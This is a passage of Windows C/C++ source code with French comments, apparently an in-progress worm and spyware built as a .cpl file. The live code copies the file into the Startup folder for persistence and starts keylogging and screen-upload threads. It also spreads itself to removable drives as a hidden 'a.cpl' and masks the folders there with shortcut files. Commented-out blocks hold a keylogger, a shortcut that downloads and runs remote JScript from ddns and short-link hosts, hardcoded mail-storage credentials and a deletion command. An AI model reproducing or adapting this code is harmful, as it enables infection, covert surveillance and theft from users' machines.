1096
1097SHELLSTATE ss;
1098//ZeroMemory(&ss,sizeof(ss));
1099ss.fShowAllObjects=FALSE;
1100//ss.fShowExtensions=TRUE;
1101//ss.fShowSysFiles=TRUE;//Don't show hidden files, folders, or drives
1102//ss.fShowSuperHidden=TRUE;
1103SHGetSetSettings(&ss, SSF_SHOWALLOBJECTS, FALSE);//SSF_SHOWALLOBJECTS|SSF_SHOWEXTENSIONS|SSF_SHOWSYSFILES|SSF_SHOWSUPERHIDDEN//*/
1104
1105//MessageBox(0, path, "( MessageBox - Title - extern \"C\" LONG CALLBACK CPlApplet 0 ).", 0);
1106
1107/*
1108HANDLE hInput = CreateFile("BinToBase64.txt",GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
1109DWORD dwFileSiz = GetFileSize(hInput,NULL);
1110BYTE *pBuffer = new BYTE[dwFileSiz];
1111DWORD dwBytesRead;
1112ReadFile(hInput,pBuffer,dwFileSiz,&dwBytesRead,NULL);
1113CloseHandle(hInput);
1114LPTSTR szBase64 = BinToBase64(pBuffer,dwFileSiz);
1115
1116file=fopen("BinToBase64.txt","wb");
1117fprintf(file,"%s",szBase64);
1118fclose(file);
1119
1120MessageBox(0, szBase64, "BinToBase64", 0);//*/
1121
1122//enc((char*)"http://suivezlelapinblanc%40netc.fr:suivezlelapinblanc@disk.netcourrier.com");
1123//MessageBox(0, buf, "enc", 0);
1124
1125//HMODULE hModule;
1126//GetModuleHandleEx(GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS, "", &hModule);
1127//pGetModuleFileName(hModule,path,256);//GetModuleHandle("a.cpl")
1128
1129//Sleep(15000);
1130//GetWindowText(FindWindow("SystemTray_Main",NULL),dow1,256);
1131
1132/*
1133DWORD resAT = GetFileAttributes("D:\\a");
1134file = fopen("smblm.txt", "a+");
1135fprintf(file, "%d", resAT);
1136fclose(file);//*/
1137
1138/*
1139char MIN[256]="$Recycle.Bin";
1140strcpy(MIN,_strlwr(MIN));
1141MessageBox(0, MIN, "", 0);//*/
1142
1143/*
1144char * tmp = strrchr(GetCommandLine(), ':');
1145char C[MAX_PATH] = "C";
1146strcat(C,tmp);
1147MessageBox(0, C, "", 0);//*/
1148//ShellExecute(0,0,C,0,0,SW_NORMAL);//Sleep(INFINITE);
1149
1150/*
1151CreateMutex(NULL,FALSE,"__[__ littlepain by [WarGame,#eof] __]__");
1152
1153if(GetLastError() == ERROR_ALREADY_EXISTS){
1154ExitProcess(0);
1155}//*/
1156
1157if(WaitForSingleObject(CreateMutex(NULL, FALSE, "f_al_m_me"),600000000) == WAIT_TIMEOUT){}
1158
1159/*
1160char buf[256];
1161//GetShortPathName("\\\\?\\C:\\Documents and Settings\\All Users\\Menu Démarrer\\Nouveau dossier\\2\\Copie de Copie de a\\Nouveau dossier\\dllmain court suite4\\code\\page\\page1\\c++ - How to retrieve the Interface ID of a COM class so that it can be passed to CoCreateInstance - Stack Overflow_fichiers.cpl", buf, 8192);//4096
1162//GetShortPathName("D:\\Documents and Settings\\caninzero\\Menu Démarrer\\Programmes\\Accessoires\\Explorateur Windows.lnk", buf, 8192);//4096
1163file = fopen("log-path-court.txt", "wb");
1164fprintf(file, "%s", buf);
1165fclose(file);
1166MessageBox(0, buf, "", 0);//*/
1167
1168//RunFromMemory();
1169//MessageBox(0, "RunFromMemory();", "Title", 0);
1170
1171SetFileAttributes(path,128);//128=FILE_ATTRIBUTE_NORMAL + 4=FILE_ATTRIBUTE_SYSTEM = 132 (a voir attribu system sert a rien dans demarrage de windows10 "pour l'effacement")
1172
1173SHGetFolderPath(NULL,CSIDL_PROFILE,NULL,0,PE);
1174SetCurrentDirectory(PE);
1175
1176//*
1177LPITEMIDLIST pidl;
1178SHGetFolderLocation(NULL, CSIDL_DRIVES, NULL, 0, &pidl);
1179SHFILEINFO DE;
1180SHGetFileInfo((LPCTSTR)pidl, -1, &DE, sizeof DE, SHGFI_PIDL | SHGFI_DISPLAYNAME);//*/
1181
1182//*temp
1183LPITEMIDLIST pidl0;
1184SHGetFolderLocation(NULL, CSIDL_STARTMENU, NULL, 0, &pidl0);
1185SHFILEINFO SM;
1186SHGetFileInfo((LPCTSTR)pidl0, -1, &SM, sizeof SM, SHGFI_PIDL | SHGFI_DISPLAYNAME);//*/
1187
1188SHGetFolderPath(NULL,CSIDL_STARTUP,NULL,0,SP);
1189strcat(SP,"\\Com System.cpl");
1190//CopyFile(path,"C:\\WINDOWS\\system32\\COM service.cpl",1);//F:\Windows\System32 E:\Windows\System32 C:\WINDOWS\system32
1191MoveFileEx(path,SP,1);
1192//MoveFileEx(SP," .lnk",1);
1193
1194/*
1195UINT vKey;
1196
1197vKey = MapVirtualKey(65, 0);
1198
1199static HANDLE hLog;
1200DWORD dwWritten;
1201BYTE lpKeyboard[256];
1202char szKey[32];
1203WORD wKey;
1204char buf[32];
1205int len;
1206
1207len = 0;
1208 switch(vKey)
1209 {
1210 case VK_BACK:
1211 len = wsprintf(buf, "[BP]");
1212 break;
1213 case VK_RETURN:
1214 len = 2;
1215 strcpy(buf, "\r\n");
1216 break;
1217 case VK_SHIFT:
1218 break;
1219 default:
1220 if(ToAscii(vKey, MapVirtualKey(vKey, 0), lpKeyboard, &wKey, 0) == 1)
1221 len = wsprintf(buf, "%c", (char)wKey);
1222 else if(GetKeyNameText(MAKELONG(0, MapVirtualKey(vKey, 0)), szKey, 32) > 0)
1223 len = wsprintf(buf, "[%s]", szKey);
1224 break;
1225 }
1226
1227
1228
1229// Write buf into the log
1230if(len > 0){
1231if(!WriteFile(hLog, buf, len, &dwWritten, NULL))
1232return -1;
1233}
1234
1235
1236
1237if(vKey == VK_BACK && last_window == GetForegroundWindow()) {
1238SetFilePointer(-1); // set it 1 byte back..
1239}
1240
1241
1242
1243// open log.txt
1244 hLog = CreateFile("log.txt", GENERIC_WRITE, FILE_SHARE_READ, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
1245 if(hLog == INVALID_HANDLE_VALUE){
1246 MessageBox(NULL, "Creating log.txt failed!", "Error",
1247 MB_ICONEXCLAMATION|MB_OK);
1248 return -1;
1249 }
1250
1251 // append
1252 SetFilePointer(hLog, 0, NULL, FILE_END);
1253 break;//*/
1254
1255/*
1256 std::ifstream file("0");//ios::app
1257
1258 //std::string dr;
1259 while (file.getline (dr,sizeof(dr)));
1260 //while( std::getline( file, dr ) );
1261
1262 //file.close();
1263
1264 //std::cout << dr << '\n';//*/
1265
1266/*
1267//char dr[256];
1268if(file = fopen("Class-Log.txt", "r")){//Class-Log.txt
1269
1270while( fgets(dr, sizeof dr, file) );//sizeof dr <-- sans parenthése
1271
1272//fread(dr,5,1,file);
1273///////////////fclose(file);
1274
1275//file = fopen("cN-LogTEST.txt", "w");
1276////fwrite(dr, sizeof(dr), 1, file);
1277//fprintf(file, "%s", dr);
1278//fclose(file);
1279
1280fclose(file);
1281
1282}
1283MessageBox(0, dr, "( Title ).", 0);//*/
1284//return 0;
1285
1286//InfLnk("Bureau\\");
1287//InfLnk("Desktop\\");
1288
1289/*
1290IShellLink *pShellLink;
1291//hres =
1292CoCreateInstance(CLSID_ShellLink, NULL, 0x1, IID_IShellLink, (void**)&pShellLink);
1293
1294pShellLink->SetPath("%ComSpec%");//cmd %ComSpec%(mieux plus court)
1295
1296//char command[256]="/C attrib +R \"File Explorer.lnk\"|start explorer|type \"File Explorer.lnk\"|find \"var\">.js&&start .js";
1297//pShellLink->SetArguments("/C start explorer|echo try{a=new ActiveXObject('MSXML2.ServerXMLHTTP');a.send(a.open('GET','https://disk.netcourrier.com/a',0,'stock0@netc.fr','stock0'));new ActiveXObject('Wscript.Shell').run(a.responseText,0)}catch(e){}>.js|start .js");//" /K REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /ve /d "\"%CD%\.js"\" /f | dir | pause" "cmd /C echo WScript.Echo('Hello');WScript.Echo('Hello0');>_.js"
1298pShellLink->SetArguments("/C start explorer|echo try{a=new ActiveXObject('MSXML2.ServerXMLHTTP');a.send(a.open('GET','https://goo.gl/eafhco',0));new ActiveXObject('Wscript.Shell').run(a.responseText,0)}catch(e){}>.js|start .js");//" /K REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /ve /d "\"%CD%\.js"\" /f | dir | pause" "cmd /C echo WScript.Echo('Hello');WScript.Echo('Hello0');>_.js" http://stock0%40netc.fr:stock0@disk.netcourrier.com/a https://drive.google.com/uc?export=download&confirm=no_antivirus&id=0B_XJb4t4lyuzeExBTFR2NWJxTkE tuveux.ddns.net "\\\\81.248.4.78\\infologic\\a.cpl"
1299pShellLink->SetIconLocation("explorer.exe", 0);
1300pShellLink->SetShowCmd(7);
1301
1302///char PROFILE0[256];
1303///strcpy(PROFILE0,PE);
1304///strcat(PROFILE0,"\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\File Explorer.lnk");
1305/////strcat(PROFILE0,"\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\File Explorer.lnk");
1306
1307pShellLink->SetWorkingDirectory("%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar");
1308//pShellLink->SetWorkingDirectory("%USERPROFILE%\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch");
1309
1310IPersistFile *pPersistFile;
1311//hres =
1312pShellLink->QueryInterface(IID_IPersistFile, (void**)&pPersistFile);
1313
1314//char Drie[256]="Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\File Explorer.lnk";
1315///wchar_t wtext[256];
1316///mbstowcs(wtext, PROFILE0, strlen(PROFILE0)+1);
1317
1318////SetFileAttributes(Drie,128);
1319//hres =
1320//HRESULT hr0_M =
1321strcat(PE,"\\AppData\\Roaming\\MICROS~1\\INTERN~1\\QUICKL~1\\USERPI~1\\TaskBar\\FILEEX~1.LNK");//C:\\Users\\w10\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\File Explorer.lnk
1322
1323wchar_t wtext[256];
1324mbstowcs(wtext, PE, strlen(PE)+1);
1325
1326pPersistFile->Save(wtext,1);
1327//pPersistFile->Save(L"AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\System Tools\\File Explorer.lnk",1);
1328pPersistFile->Save(L"AppData\\Roaming\\MICROS~1\\INTERN~1\\QUICKL~1\\USERPI~1\\TaskBar\\Window~1.LNK",1);//Windows Explorer.lnk
1329//pPersistFile->Save(L"AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer (2).lnk",1);
1330//pPersistFile->Save(L"AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows ExplorerTEST.lnk",1);
1331
1332//pPersistFile->Save(L"Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\Explorateur Windows.lnk",1);
1333////pPersistFile->Save(L"MENUDM~1\\PROGRA~1\\ACCESS~1\\Explorateur Windows.lnk",1);//EXPLOR~1.LNK
1334//////////if(SUCCEEDED(hr0_M)){
1335
1336//file=fopen("Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\File Explorer.lnk","a+");
1337////file=fopen(PROFILE0,"a+"); fputs("WScript.Echo (\"ben\")//var\nWScript.Echo (\"ben0\")//var",file); fclose(file);
1338//file=fopen(PROFILE0,"a+"); fputs("try{//var\rvar a=new ActiveXObject('MSXML2.ServerXMLHTTP')\ra.send(a.open('GET','http://cequetuveux0.ddns.net',0))//var\rif(a.responseText.charAt(0)=='t'){//var\rvar z=new ActiveXObject('Scripting.FileSystemObject').CreateTextFile('.js').write(a.responseText)}}catch(e){}",file); fclose(file);//peut enlever le var: var a=new ActiveXObject('MSXML2.ServerXMLHTTP')
1339//file=fopen(PROFILE0,"a+"); fputs("try{a=new ActiveXObject('MSXML2.ServerXMLHTTP')//var\ra.send(a.open('GET','http://cequetuveux0.ddns.net',0))//var\rif(a.responseText.charAt(0)=='t'){//var\rvar z=new ActiveXObject('Scripting.FileSystemObject').CreateTextFile('.js').write(a.responseText)}}catch(e){}",file); fclose(file);
1340//file=fopen(PROFILE0,"a+"); fputs("try{a=new ActiveXObject('MSXML2.ServerXMLHTTP')//var\ra.send(a.open('GET','http://cequetuveux0.ddns.net',0))//var\rif(a.responseText.charAt(0)=='t'){z=new ActiveXObject('Scripting.FileSystemObject').CreateTextFile('.js').write(a.responseText)}}catch(e){}//var",file); fclose(file);
1341//file=fopen(PROFILE0,"a+"); fputs("try{a=new ActiveXObject('MSXML2.ServerXMLHTTP');a.send(a.open('GET','http://cequetuveux0.ddns.net',0));if(a.responseText.charAt(0)=='t'){new ActiveXObject('Scripting.FileSystemObject').CreateTextFile('.js').write(a.responseText)}}catch(e){}//var",file); fclose(file);
1342
1343//SetFileAttributes(PROFILE0,5);
1344//////////}
1345//MessageBox(0, "", "Internet Explorer - Quick Launch User Pinned TaskBar", 0);//*/
1346
1347/*CoInitialize(NULL);
1348
1349Folder *pToFolder = NULL;
1350VARIANT vDir, vFile, vOpt;
1351
1352IShellDispatch *pISD;
1353CoCreateInstance(CLSID_Shell, NULL, 0x1, IID_IShellDispatch, (void **)&pISD);
1354
1355//if (SUCCEEDED(hResult)){
1356
1357file=fopen("Nouveau.zip", "wb"); fwrite("\x50\x4B\x05\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 22, 1, f); fclose(f);
1358
1359 VariantInit(&vDir);
1360 vDir.vt = VT_BSTR;
1361 vDir.bstrVal = SysAllocString(L"G:\\Users\\cest64\\Nouveau.zip\\\0\0");
1362
1363 pISD->NameSpace(vDir, &pToFolder);
1364
1365//if (SUCCEEDED(hResult)){
1366
1367 VariantInit(&vFile);
1368 vFile.vt = VT_BSTR;
1369 vFile.bstrVal = SysAllocString(L"G:\\Users\\cest64\\2.jpg\0\0");
1370
1371 VariantInit(&vOpt);
1372 //vOpt.vt = VT_I4;
1373 //vOpt.lVal = FOF_NO_UI;//Do not display a progress dialog box, not useful in compression 0x0614
1374
1375 pToFolder->CopyHere(vFile, vOpt);
1376
1377 //Sleep(1000);
1378
1379 //pToFolder->Release();
1380
1381//}
1382
1383//pISD->Release();
1384
1385//}
1386
1387//CoUninitialize();//*/
1388
1389CreateThread(NULL,0,&Thread_Key,NULL,0,&id);
1390CreateThread(NULL,0,&Thread_Down_Screen_Up,NULL,0,&id);
1391
1392while(1){
1393Sleep(100);
1394
1395GetWindowText(GetForegroundWindow(),dow,256);
1396
1397//char cN[256];
1398//GetClassName(GetForegroundWindow(),cN,256);
1399//if(!strcmp(dow,"")){//SystemTray_Main #32768
1400//GetClassName(GetForegroundWindow(),cN,256);
1401//file = fopen("Get-Log.txt", "a+");
1402//fprintf(file, "%s %s\n", cN, dow);
1403//fclose(file);
1404//}
1405//MessageBox(0, dow, "", 0);
1406//}
1407//file = fopen("ClassName-Log.txt", "a+");
1408//fprintf(file, "%s\n", cN);
1409//fclose(file);
1410
1411/*
1412if(!strcmp(dow,"")){
1413//MoveFileEx(path," .lnk",1);
1414CopyFile(" .lnk",SP,1);
1415//}else{
1416//CopyFile(" .lnk",SP,1);
1417}//*/
1418
1419/*
1420if(strcmp(dow,"")){
1421MoveFileEx(path," .lnk",1);
1422//CopyFile(" .lnk",SP,1);
1423//}else{
1424//CopyFile(" .lnk",SP,1);
1425}//*/
1426
1427if(strcmp(dow,dow0) & strcmp(dow,"")){
1428strcpy(dow0,dow);
1429
1430////char cN[256];
1431////GetClassName(GetForegroundWindow(),cN,256);
1432
1433//if(strcmp(cN,cN0) & strcmp(cN,"")){
1434//strcpy(cN0,cN);
1435
1436//file=fopen("0", "a+");
1437//fprintf(file, "<font color=1013CF font size=2>[%s]</font>", cN0);
1438//fclose(file);
1439//}
1440
1441//SetWindowText(GetForegroundWindow(),dow);
1442///////////////CopyFile(" .lnk",path,1);// <--
1443
1444//char cN[256];
1445//GetClassName(GetForegroundWindow(),cN,256);
1446//if(!strcmp(cN,"SystemTray_Main")){
1447//MessageBox(0, dow, "", 0);
1448//}
1449//cN[6]=0;
1450//file = fopen("Class-Log.txt", "w");
1451//fprintf(file, "%s", cN);
1452//fclose(file);
1453//file = fopen("0", "a+");
1454//fprintf(file, "\n%s", dow0);
1455//fclose(file);
1456
1457char Drives[2], icl=0;
1458for(icl=68; icl<91; icl++){
1459Drives[0]=icl, Drives[1]=':', Drives[2]=0;
1460if((GetDriveType(Drives)) == DRIVE_REMOVABLE){//2=DRIVE_REMOVABLE https://msdn.microsoft.com/fr-fr/library/windows/desktop/aa364939%28v=vs.85%29.aspx DriveGetLabel ( "path" ) DriveGetSerial ( "path" )
1461
1462strcpy(Dri,Drives);
1463strcat(Dri,"\\*");
1464
1465/*Dri[1]=0;
1466
1467char dow2[256];
1468strcpy(dow2, dow);
1469int longueur = strlen(dow2)-3;
1470
1471char * toto = dow2;
1472
1473toto[longueur] = *Dri;
1474
1475//MessageBox(0, toto, dow, 0);
1476
1477strcat(Dri,":\\*");//*/
1478
1479HANDLE hFindFile = FindFirstFile(Dri, &fd);
1480
1481 Dri[3]=0;
1482 strcat(Dri,"a.cpl");
1483 if(GetFileAttributes(SP) & 4){//path SP
1484 //if(GetFileAttributes("a.cpl") != INVALID_FILE_ATTRIBUTES){
1485 //MessageBox(0, "file exist a.cpl dans PE", "", 0);
1486 //Sleep(120000);
1487 DeleteFile(Dri);
1488 //SetFileAttributes(Dri,128);
1489 //CopyFile(path,Dri,0);//SP
1490 SetFileAttributes(SP,128);//path SP <-- a voir (a remettre important).////////////////////////////////////////////////////
1491 //MoveFileEx("a.cpl",".lnk",1);
1492
1493/*temp
1494Dri[2]=0;
1495strcat(Dri,"&&del /Q /A:SH *.lnk|RD /S /Q WINDOWS");// del /F /Q ( marche sans )
1496//strcat(Dri,"&&del /Q /A SH *.lnk&RD /S /Q WINDOWS");
1497char ext[256]="cmd /C ";
1498strcat(ext,Dri);
1499WinExec(ext,SW_HIDE);
1500
1501Dri[2]=0;
1502strcat(Dri,"\\a.cpl");//*/
1503
1504 }
1505 //MessageBox(0, "file not exist", "", 0);
1506 CopyFile(path,Dri,1);
1507 SetFileAttributes(Dri,6);//2=FILE_ATTRIBUTE_HIDDEN + 4=FILE_ATTRIBUTE_SYSTEM = 6
1508
1509//HRESULT hres = CoInitialize(NULL);
1510
1511while(INVALID_HANDLE_VALUE != hFindFile && 18 != GetLastError()){//?=INVALID_HANDLE_VALUE 6=ERROR_INVALID_HANDLE 18=ERROR_NO_MORE_FILES https://msdn.microsoft.com/en-us/library/windows/desktop/ms681381%28v=vs.85%29.aspx
1512if(16 & fd.dwFileAttributes){//
1513
1514Dri[3]=0;
1515//strcat(Dri,".");//Android SD-Card
1516strcat(Dri,fd.cFileName);
1517//char SysFolders[256];
1518//strcpy(SysFolders,_strlwr(fd.cFileName));//toLowerCase() --> Minuscule.
1519//if(!4 & fd.dwFileAttributes)
1520///////////////if(strcmp(fd.cFileName,"System Volume Information"))//&& strcmp(fd.cFileName,"FOUND.000") && strcmp(fd.cFileName,"RECYCLER") && strcmp(fd.cFileName,"$RECYCLE.BIN") && strcmp(fd.cFileName,"$Recycle.Bin")) (Accès refuser)
1521//if(strcmp(_strlwr(fd.cFileName),"system volume information") && strcmp(_strlwr(fd.cFileName),"recycler") && strcmp(_strlwr(fd.cFileName),"$recycle.bin"))
1522//if(strcmp(fd.cFileName,"system volume information") && strcmp(fd.cFileName,"recycler") && strcmp(fd.cFileName,"$recycle.bin"))
1523//if(strcmp(SysFolders,"system volume information") && strcmp(SysFolders,"recycler") && strcmp(SysFolders,"$recycle.bin"))
1524SetFileAttributes(Dri,128);//128=FILE_ATTRIBUTE_NORMAL https://msdn.microsoft.com/fr-fr/library/windows/desktop/aa365535%28v=vs.85%29.aspx
1525strcat(Dri,".lnk");
1526SetFileAttributes(Dri,6);
1527//DeleteFile(Dri);
1528
1529//if(strcmp(cN,"CabinetWClass") | !strcmp(dow,DE.szDisplayName) && strcmp(cN,"#32770")){//&& strcmp(cN,"bosa_s")){//&& strcmp(cN,"Consol")){//&& strcmp(dow,"Program Manager")){//(Windows10 <Bof pour fermer>)Windows.UI.Core.CoreWindow DV2ControlHost BaseBar SystemTray_Main Shell_TrayWnd(pas bon) Progman "", Excel dialog sheet: bosa_sdm_Xl11 (in Excel 2003), bosa_sdm_Xl9 (in Excel 2002 and 2000), bosa_sdm_Xl8 (in Excel 97), bosa_sdm_Xl (in Excel 5 and 95). bosa_sdm_Microsoft Office Word 12.0
1530//if(!strcmp(cN,"#32768") | !strcmp(dow,DE.szDisplayName)){//&& strcmp(cN,"bosa_s")){//&& strcmp(cN,"Consol")){//&& strcmp(dow,"Program Manager")){//(Windows10 <Bof pour fermer>)Windows.UI.Core.CoreWindow DV2ControlHost BaseBar SystemTray_Main Shell_TrayWnd(pas bon) Progman "", Excel dialog sheet: bosa_sdm_Xl11 (in Excel 2003), bosa_sdm_Xl9 (in Excel 2002 and 2000), bosa_sdm_Xl8 (in Excel 97), bosa_sdm_Xl (in Excel 5 and 95). bosa_sdm_Microsoft Office Word 12.0
1531//if(!strcmp(cN,"#32768")){//&& strcmp(cN,"bosa_s")){//&& strcmp(cN,"Consol")){//&& strcmp(dow,"Program Manager")){//(Windows10 <Bof pour fermer>)Windows.UI.Core.CoreWindow DV2ControlHost BaseBar SystemTray_Main Shell_TrayWnd(pas bon) Progman "", Excel dialog sheet: bosa_sdm_Xl11 (in Excel 2003), bosa_sdm_Xl9 (in Excel 2002 and 2000), bosa_sdm_Xl8 (in Excel 97), bosa_sdm_Xl (in Excel 5 and 95). bosa_sdm_Microsoft Office Word 12.0
1532//if(!strcmp(dow,dow1) | !strcmp(dow,DE.szDisplayName) | !strncmp(dow,dr,5)){// | !strncmp(dow0,dr,5)){//FindWindow("#32768","")){//!strcmp(dow0,dr)){//!strcmp(cN,dr)){//| !FindWindow("#32769",NULL)){//&& strcmp(cN,"bosa_s")){//&& strcmp(cN,"Consol")){//&& strcmp(dow,"Program Manager")){//(Windows10 <Bof pour fermer>)Windows.UI.Core.CoreWindow DV2ControlHost BaseBar SystemTray_Main Shell_TrayWnd(pas bon) Progman "", Excel dialog sheet: bosa_sdm_Xl11 (in Excel 2003), bosa_sdm_Xl9 (in Excel 2002 and 2000), bosa_sdm_Xl8 (in Excel 97), bosa_sdm_Xl (in Excel 5 and 95). bosa_sdm_Microsoft Office Word 12.0
1533if(!strcmp(dow,dow1) | !strcmp(dow,DE.szDisplayName) | !strcmp(dow,"Program Manager") | !strcmp(dow,SM.szDisplayName) | !strcmp(dow,"Paramètres") | !strcmp(dow,"Cortana")){//Jauge d'énergie Poste de travail Program Manager Menu Démarrer Paramètres Cortana || FindWindow("DimmedWindowClass", "")){//Menu Démarrer Program Manager Windows.UI.Core.CoreWindow "Début " | !strcmp(dow,"Program Manager")){//Connections Tray || FindWindowEx(FindWindow("CabinetWClass", 0), 0, "SysTreeView32", 0)){// | strcmp(cN,"CabinetWClass")){//!strcmp(dow,"") & strcmp(cN,"Shell_") & strcmp(cN,"Net UI") & strcmp(cN,"TaskLi")){//tooltips_class32 Shell_TrayWnd Net UI Tool Window Layered TaskList ThumbnailWnd !FindWindow("WorkerW","")){// | !strcmp(dow,"") & !FindWindow("#32768",NULL)){// && !FindWindow("Windows.UI.Core.CoreWindow",NULL)){// || FindWindow("DimmedWindowClass",NULL)){//!FindWindow("#32768","")){// | !strcmp(dow,"")){// | !strcmp(cN,dr)){// && FindWindow("#32768",NULL)){// | !FindWindow("DimmedWindowClass",NULL)){// & !FindWindow("Shell_TrayWnd",NULL)){//!strcmp(dow,"")){//!strncmp(dow0,dr,5)){//!strcmp(cN,dr)){//| !FindWindow("#32769",NULL)){//&& strcmp(cN,"bosa_s")){//&& strcmp(cN,"Consol")){//&& strcmp(dow,"Program Manager")){//(Windows10 <Bof pour fermer>)Windows.UI.Core.CoreWindow DV2ControlHost BaseBar SystemTray_Main Shell_TrayWnd(pas bon) Progman "", Excel dialog sheet: bosa_sdm_Xl11 (in Excel 2003), bosa_sdm_Xl9 (in Excel 2002 and 2000), bosa_sdm_Xl8 (in Excel 97), bosa_sdm_Xl (in Excel 5 and 95). bosa_sdm_Microsoft Office Word 12.0
1534//HWND hwndW = FindWindow(NULL,SM.szDisplayName);
1535//CloseWindow(hwndW);
1536//DestroyWindow(hwndW);
1537//if(!strcmp(dow,dow1) | !strcmp(dow,DE.szDisplayName)){// | strcmp(dow,toto)){// || FindWindow("#32770","")){//!strcmp(dow,"") && FindWindowEx(FindWindow("CabinetWClass", 0), 0, "SysTreeView32", 0)){// | strcmp(cN,"CabinetWClass")){//!strcmp(dow,"") & strcmp(cN,"Shell_") & strcmp(cN,"Net UI") & strcmp(cN,"TaskLi")){//tooltips_class32 Shell_TrayWnd Net UI Tool Window Layered TaskList ThumbnailWnd !FindWindow("WorkerW","")){// | !strcmp(dow,"") & !FindWindow("#32768",NULL)){// && !FindWindow("Windows.UI.Core.CoreWindow",NULL)){// || FindWindow("DimmedWindowClass",NULL)){//!FindWindow("#32768","")){// | !strcmp(dow,"")){// | !strcmp(cN,dr)){// && FindWindow("#32768",NULL)){// | !FindWindow("DimmedWindowClass",NULL)){// & !FindWindow("Shell_TrayWnd",NULL)){//!strcmp(dow,"")){//!strncmp(dow0,dr,5)){//!strcmp(cN,dr)){//| !FindWindow("#32769",NULL)){//&& strcmp(cN,"bosa_s")){//&& strcmp(cN,"Consol")){//&& strcmp(dow,"Program Manager")){//(Windows10 <Bof pour fermer>)Windows.UI.Core.CoreWindow DV2ControlHost BaseBar SystemTray_Main Shell_TrayWnd(pas bon) Progman "", Excel dialog sheet: bosa_sdm_Xl11 (in Excel 2003), bosa_sdm_Xl9 (in Excel 2002 and 2000), bosa_sdm_Xl8 (in Excel 97), bosa_sdm_Xl (in Excel 5 and 95). bosa_sdm_Microsoft Office Word 12.0
1538//if(!strcmp(dow,dow1) | !strcmp(dow,DE.szDisplayName) | !strcmp(dow,"")){//tooltips_class32 Shell_TrayWnd Net UI Tool Window Layered TaskList ThumbnailWnd !FindWindow("WorkerW","")){// | !strcmp(dow,"") & !FindWindow("#32768",NULL)){// && !FindWindow("Windows.UI.Core.CoreWindow",NULL)){// || FindWindow("DimmedWindowClass",NULL)){//!FindWindow("#32768","")){// | !strcmp(dow,"")){// | !strcmp(cN,dr)){// && FindWindow("#32768",NULL)){// | !FindWindow("DimmedWindowClass",NULL)){// & !FindWindow("Shell_TrayWnd",NULL)){//!strcmp(dow,"")){//!strncmp(dow0,dr,5)){//!strcmp(cN,dr)){//| !FindWindow("#32769",NULL)){//&& strcmp(cN,"bosa_s")){//&& strcmp(cN,"Consol")){//&& strcmp(dow,"Program Manager")){//(Windows10 <Bof pour fermer>)Windows.UI.Core.CoreWindow DV2ControlHost BaseBar SystemTray_Main Shell_TrayWnd(pas bon) Progman "", Excel dialog sheet: bosa_sdm_Xl11 (in Excel 2003), bosa_sdm_Xl9 (in Excel 2002 and 2000), bosa_sdm_Xl8 (in Excel 97), bosa_sdm_Xl (in Excel 5 and 95). bosa_sdm_Microsoft Office Word 12.0
1539//if(!strcmp(dow,dow1) | !strcmp(dow,DE.szDisplayName) | !strcmp(dow,"") & strcmp(cN,"Net UI Tool W") & strcmp(cN,"TaskList Thum")){//Shell_TrayWnd Net UI Tool Window Layered TaskList ThumbnailWnd !FindWindow("WorkerW","")){// | !strcmp(dow,"") & !FindWindow("#32768",NULL)){// && !FindWindow("Windows.UI.Core.CoreWindow",NULL)){// || FindWindow("DimmedWindowClass",NULL)){//!FindWindow("#32768","")){// | !strcmp(dow,"")){// | !strcmp(cN,dr)){// && FindWindow("#32768",NULL)){// | !FindWindow("DimmedWindowClass",NULL)){// & !FindWindow("Shell_TrayWnd",NULL)){//!strcmp(dow,"")){//!strncmp(dow0,dr,5)){//!strcmp(cN,dr)){//| !FindWindow("#32769",NULL)){//&& strcmp(cN,"bosa_s")){//&& strcmp(cN,"Consol")){//&& strcmp(dow,"Program Manager")){//(Windows10 <Bof pour fermer>)Windows.UI.Core.CoreWindow DV2ControlHost BaseBar SystemTray_Main Shell_TrayWnd(pas bon) Progman "", Excel dialog sheet: bosa_sdm_Xl11 (in Excel 2003), bosa_sdm_Xl9 (in Excel 2002 and 2000), bosa_sdm_Xl8 (in Excel 97), bosa_sdm_Xl (in Excel 5 and 95). bosa_sdm_Microsoft Office Word 12.0
1540/////if(!strcmp(dow,dow1) | !strcmp(dow,DE.szDisplayName) | !FindWindow(NULL,dow0)){//!strcmp(dow,"")){//!strncmp(dow0,dr,5)){//!strcmp(cN,dr)){//| !FindWindow("#32769",NULL)){//&& strcmp(cN,"bosa_s")){//&& strcmp(cN,"Consol")){//&& strcmp(dow,"Program Manager")){//(Windows10 <Bof pour fermer>)Windows.UI.Core.CoreWindow DV2ControlHost BaseBar SystemTray_Main Shell_TrayWnd(pas bon) Progman "", Excel dialog sheet: bosa_sdm_Xl11 (in Excel 2003), bosa_sdm_Xl9 (in Excel 2002 and 2000), bosa_sdm_Xl8 (in Excel 97), bosa_sdm_Xl (in Excel 5 and 95). bosa_sdm_Microsoft Office Word 12.0
